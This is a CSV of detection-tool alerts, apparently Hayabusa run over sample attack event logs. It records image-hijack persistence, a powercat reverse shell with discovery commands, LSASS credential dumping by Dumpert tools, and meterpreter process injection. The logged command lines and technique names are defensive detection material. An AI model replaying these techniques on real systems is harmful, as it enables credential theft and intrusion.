2019-06-20 02:22:55.397 +09:00,IEWIN7,1,info,,Process Created,"Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1352 | PGUID: 365ABB72-6F6F-5D0A-0000-001046451300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:58.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0 | LID: 0x134a4 | PID: 2112 | PGUID: 365ABB72-6F72-5D0A-0000-001004551300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:58.944 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:01.928 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1224 | PGUID: 365ABB72-6F75-5D0A-0000-001082611300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:01.990 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-6F75-5D0A-0000-0010E5671300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:02.350 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin | Process: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe | User: IEWIN7\IEUser | Parent Cmd: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1] | LID: 0x134fc | PID: 3744 | PGUID: 365ABB72-6F76-5D0A-0000-001064701300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:10.334 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x134fc | PID: 2396 | PGUID: 365ABB72-6F7C-5D0A-0000-0010FE201400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:11.694 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0 | LID: 0x134fc | PID: 3800 | PGUID: 365ABB72-6F7F-5D0A-0000-0010B66E1400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:11.694 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 17:07:42.331 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\NETSTAT.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1284 | Tgt PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:42.331 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NETSTAT.EXE"" -na | Process: C:\Windows\System32\NETSTAT.EXE | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1284 | PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:42.331 +09:00,IEWIN7,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.909 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 888 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.909 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 888 | PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.925 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1440 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.925 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1440 | PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:50.378 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:4444 (IEWIN7) | Dst: 10.0.2.18:38208 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 816 | PGUID: 365ABB72-3D05-5D0B-0000-001004220D00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:52.956 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 1476 | PGUID: 365ABB72-3ED8-5D0B-0000-0010398F1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:58.816 +09:00,IEWIN7,1,info,,Process Created,"Cmd: systeminfo | Process: C:\Windows\System32\systeminfo.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 3820 | PGUID: 365ABB72-3EDE-5D0B-0000-001032961A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-20 17:07:58.816 +09:00,IEWIN7,1,low,Disc,Suspicious Execution of Systeminfo,,rules/sigma/process_creation/proc_creation_win_susp_systeminfo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Outflank-Dumpert.exe | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Hash: SHA1=3A41FF5A6CDEC8829876E0486A0072BC8D13DCF1,MD5=D4940C501545BCFD11D6DC75B5D0FEC9,SHA256=38879FE4AA25044DB241B093E6A1CF904BA9F4E999041C0CC039E2D5F7ABA044,IMPHASH=88788EE624180BE467F3C32F4720AA97",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,info,,Process Created,"Cmd: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump | Process: C:\Windows\System32\rundll32.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: AndrewSpecial.exe | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Hash: SHA1=FE6BEB0E26F71F8587415507B318B161FBC3338B,MD5=4791C98C096587DB8DFECD5CA894DD56,SHA256=2969E70B74A12E3B0441D0BDA498322464A8614421B00321E889756D60AB4200,IMPHASH=40B5A4911712471B34D39C3AC7E99193",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\Desktop\Andrew.dmp | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:36:51.681 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
2019-07-04 05:10:06.475 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Lateral Movement - New Named Pipe added to NullSession | SetValue: HKLM\System\CurrentControlSet\services\LanmanServer\Parameters\NullSessionPipes: Binary Data | Process: C:\Windows\system32\reg.exe | PID: 3844 | PGUID: 365ABB72-0B9E-5D1D-0000-00100BF40D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_add_new_namedpipe_tp_nullsession_registry_turla_like_ttp.evtx
2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:29.223 +09:00,IEWIN7,10,low,,Process Access,Src Process: ㄀ | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.129 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.160 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
